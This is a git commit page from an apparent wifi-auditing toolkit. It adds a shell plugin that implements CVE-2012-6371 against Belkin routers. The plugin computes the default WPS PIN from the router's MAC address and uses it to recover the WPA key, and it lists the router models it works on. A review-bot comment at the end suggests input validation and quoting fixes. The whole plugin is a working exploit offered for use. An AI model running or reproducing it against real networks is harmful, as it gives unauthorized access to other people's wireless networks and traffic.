authormakefu <github@syntax-fehler.de>2014-12-20 22:02:08 +0100
committermakefu <github@syntax-fehler.de>2014-12-20 22:02:08 +0100
commit16e1373ddd9050dd06cd699b2874cf178375574b (patch)
tree0352a0f39f4426327ffd4aa16dad8e0e15a6a8c4 /usr/lib/autowifi/plugins/11belkin_wps
parent120114ad12a212331e9e790305a4ab3afdc15857 (diff)
parent6a9beb12dad44b5e1efa984b112c7a6b8c13a118 (diff)
Merge remote-tracking branch 'inspector_wifi/wifi_scanner'
Conflicts: .gitignore
Diffstat (limited to 'usr/lib/autowifi/plugins/11belkin_wps')
-rwxr-xr-xusr/lib/autowifi/plugins/11belkin_wps40
1 files changed, 40 insertions, 0 deletions
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
new file mode 100755
index 00000000..d4eb8e37
--- /dev/null
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -0,0 +1,40 @@
+#!/bin/sh
+# thanks to http://ednolo.alumnos.upv.es/?p=1295G
+# for the PoC code
+# Calculates the default WPS pin of Belkin Routers and returns the WPA key
+#
+# Implementation of CVE-2012-6371
+
+# works :
+# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000
+# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000
+# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+. ../lib/wps
+parse_plugin_args "$@"
+
+check_painmode
+
+! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1
+
+calc_belkin(){
+ PRIVATE_MAC=${1}
+
+ p=$((0x$PRIVATE_MAC % 10000000))
+ wps_pin_checksum(){
+ pin=$1
+ accum=0
+ while [ $pin -ne 0 ];do
+ accum=$((accum + (3 * (pin % 10)) ))
+ pin=$((pin/10))
+ accum=$((accum + pin %10 ))
+ pin=$((pin/10))
+ done
+ echo $(( (10 - accum % 10) % 10))
+ }
+ printf "%07d%d" $p $(wps_pin_checksum $p)
+ return 0
+}
+try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})
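Review bot: `calc_belkin` substitutes `PRIVATE_MAC` straight into `$((0x$PRIVATE_MAC % 10000000))` with no format check, and the value is set outside this file (presumably by `parse_plugin_args` from scan data, which is not visible here). An empty or non-hex value makes the arithmetic expansion fail or evaluate text the script did not intend, so a guard such as `case "$PRIVATE_MAC" in ''|*[!0-9A-Fa-f]*) echo "bad PRIVATE_MAC" >&2; exit 1;; esac` belongs at top level before the final line. That final line also re-splits arguments that `parse_plugin_args "$@"` received intact, so it should read `try_wps_pin "$@" "$(calc_belkin "$PRIVATE_MAC")"`. The `cd $(dirname $(readlink -f $0))` line has no failure check either, so if it fails the two relative `.` includes resolve against the caller's directory; `cd "$(dirname "$(readlink -f "$0")")" || exit 1` closes that.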